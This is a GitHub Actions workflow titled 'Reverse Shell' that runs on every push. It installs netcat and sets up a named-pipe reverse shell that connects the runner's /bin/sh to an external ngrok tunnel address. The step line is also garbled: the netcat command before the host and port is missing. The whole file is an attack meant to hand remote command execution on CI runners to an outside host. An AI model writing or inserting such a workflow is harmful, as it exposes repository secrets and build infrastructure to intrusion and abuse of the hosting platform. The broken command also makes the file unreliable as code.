name: Reverse Shell

on: [push]

jobs:
  reverse_shell:
    runs-on: ubuntu-latest

    steps:
    - name: install netcat and Start persistant Reverse Shell loop
      run: |
        sudo apt-get install -y netcat
        mkfifo /tmp/f; 0.tcp.us-cal-1.ngrok.io:14657 < /tmp/f | /bin/sh > /tmp/f 2>&1 
